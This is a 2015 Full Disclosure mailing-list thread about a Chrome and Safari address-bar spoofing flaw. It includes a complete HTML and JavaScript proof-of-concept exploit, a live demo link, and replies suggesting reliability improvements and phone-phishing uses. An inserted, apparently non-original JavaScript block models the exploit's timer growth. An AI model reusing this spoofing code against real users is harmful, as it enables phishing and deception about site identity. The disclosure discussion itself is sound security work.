Re: [FD] Google Chrome Address Spoofing (Request For Comment)
Yes this is a pretty good find. I can also confirm it works on iOS 8.3 (12F69) with Safari.

DW

Sent from my iPad

On Jul 2, 2015, at 9:33 AM, Mustafa Al-Bassam <m...@musalbas.com> wrote:

> [...]
>
> On 30 Jun 2015 7:08 am, David Leo <david@deusen.co.uk> wrote:
>
>> [...]

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
Re: [FD] Google Chrome Address Spoofing (Request For Comment)
Found this POC: musalbas/address-spoofing-poc - Chrome address spoofing vulnerability proof-of-concept for HTTPS. (Original by David Leo.)
https://github.com/musalbas/address-spoofing-poc

On Thursday, July 2, 2015 9:21 AM, Valentinas Bakaitis <v.bakai...@gmail.com> wrote:

> [...]
>
> On Tue, Jun 30, 2015 at 6:08 PM, David Leo <david@deusen.co.uk> wrote:
>
>> [...]
Re: [FD] Google Chrome Address Spoofing (Request For Comment)
That's pretty neat. Played around with this and made a few discoveries.

1. It shows a valid certificate when you spoof HTTPS sites. That's really bad. POC/screenshot: https://github.com/musalbas/address-spoofing-poc

2. The page isn't responsive when using this flaw. That means you can't spoof a login box for example. (I tried.)

3. The success of the exploit seems to depend on if the browser can start loading content.html fast enough. I noticed that the exploit works 100% of the time when used locally. Perhaps a better version of the exploit would somehow preload content.html - for example by opening a window with a URL that starts with javascript: followed by a script to display the content? That, or perhaps reducing the interval time for trying to run next() after the popup is created.

I wonder if this works on any other browsers?

Mustafa

On 30 Jun 2015 7:08 am, David Leo <david@deusen.co.uk> wrote:

> [...]
Re: [FD] Google Chrome Address Spoofing (Request For Comment)
> We reported this to Google. They reproduced, and say "It's DoS which doesn't matter".
> We think it's very strange, since the browser does not crash (not DoS),

I think they called it DOS because the chrome.exe process starts to consume system memory out of control. In my example (Win7 Chrome 43.0.2357.130) it ended up consuming 4GB+ of memory before it finally gave up 3 minutes or so later and issued an error message in both windows. Potentially, with multiple such frames being launched one could make it crash. That's beside the point though as the URL spoofing is clearly there.

--Mike
Re: [FD] Google Chrome Address Spoofing (Request For Comment)
Can you perform any actions on the page once the URL is replaced, or is it non-responsive? (asking because PoC did not work on my Chrome 43.0.2357.130 (64-bit) on OSX). If it is non-responsive then the impact is very limited. Worst thing I can think of is showing "your account is suspended, please contact technical support on 0800-555-555" and then using the trust user puts in the URL for phone phishing. If it is responsive, then it's indeed pretty bad.

Cheers!
V.

On Tue, Jun 30, 2015 at 6:08 PM, David Leo <david@deusen.co.uk> wrote:

> [...]
[FD] Google Chrome Address Spoofing (Request For Comment)
Impact:
The "click to verify" thing is completely broken... Anyone can be "BBB Accredited Business" etc.
You can make whitehouse.gov display "We love Islamic State" :-)

Note:
No user interaction on the fake page.

Code:
* index.html
<script>
function next()
{
    w.location.replace('http://www.oracle.com/index.html?'+n);n++;
    setTimeout("next();",15);
    setTimeout("next();",25);
}
function f()
{
    w=window.open("content.html","_blank","width=500 height=500");
    i=setInterval("try{x=w.location.href;}catch(e){clearInterval(i);n=0;next();}",5);
}
</script>
<a href="#" onclick="f()">Go</a><br>

* content.html
<b>This web page is NOT oracle.com</b>
<script>location="http://www.oracle.com/index.html";</script>

* It's online
http://www.deusen.co.uk/items/gwhere.6128645971389012/
(The page says "June/16/2015" - it works as we tested today)

Request For Comment:
We reported this to Google. They reproduced, and say "It's DoS which doesn't matter".
We think it's very strange, since the browser does not crash (not DoS), and the threat is obvious.
What's your opinion?

Kind Regards,

PS
We love clever tricks. We love this: http://dieyu.org/
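To see why Mike's reply reports runaway memory use and why Google filed this as DoS, here is an added example (my own analysis code, not part of the thread or of David Leo's PoC) that models the timer fan-out of the posted next() function without opening windows or navigating anything; the function names and the 1000 ms horizon are my assumptions.

```javascript
// Added example, not part of the thread or of the PoC. Each next() call in the
// posted index.html schedules two more calls (15 ms and 25 ms later), so the
// queue of pending callbacks grows geometrically instead of draining. This
// discrete-time model only counts scheduled callbacks. BigInt is used because
// the counts pass 2^53 within one simulated second.

function simulateTimerFanOut(delaysMs, horizonMs) {
  const maxDelay = Math.max(...delaysMs);
  // firing[t] = number of callbacks that run at simulated millisecond t;
  // sized past the horizon so callbacks scheduled near the end are kept.
  const firing = new Array(horizonMs + maxDelay + 1).fill(0n);
  firing[0] = 1n;                              // the initial next() from f()
  let totalFired = 0n;
  let peakPending = 0n;
  for (let t = 0; t <= horizonMs; t++) {
    const n = firing[t];
    totalFired += n;
    // every callback that fires now schedules one new callback per delay
    for (const d of delaysMs) firing[t + d] += n;
    // callbacks scheduled but not yet fired at the end of millisecond t;
    // nothing fired so far can be due later than t + maxDelay
    let pending = 0n;
    for (let u = t + 1; u <= t + maxDelay; u++) pending += firing[u];
    if (pending > peakPending) peakPending = pending;
  }
  return { totalFired, peakPending };
}

// The posted pattern (two reschedules per call) beside a single reschedule,
// which keeps exactly one callback pending and never grows.
function compareReschedulePatterns(horizonMs) {
  return {
    posted: simulateTimerFanOut([15, 25], horizonMs),
    single: simulateTimerFanOut([15], horizonMs),
  };
}

const r = compareReschedulePatterns(1000);
console.log(`two reschedules: fired=${r.posted.totalFired} peakPending=${r.posted.peakPending}`);
console.log(`one reschedule:  fired=${r.single.totalFired} peakPending=${r.single.peakPending}`);
```

The first line of output is the resource-exhaustion side of the report: the pending-timer count after one second is far beyond what any event loop can hold, which matches the 4GB+ memory growth Mike describes.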
Re: [FD] Google Chrome Address Spoofing (Request For Comment)
2015-06-30 3:08 GMT-03:00 David Leo <david@deusen.co.uk>:

> Impact:
> The "click to verify" thing is completely broken... Anyone can be "BBB Accredited Business" etc.
> You can make whitehouse.gov display "We love Islamic State" :-)

Did not work for me. I have been redirected to Oracle's actual website and then to a blank page later. Strangely though, it worked on the desktop version of Opera.

--
Roney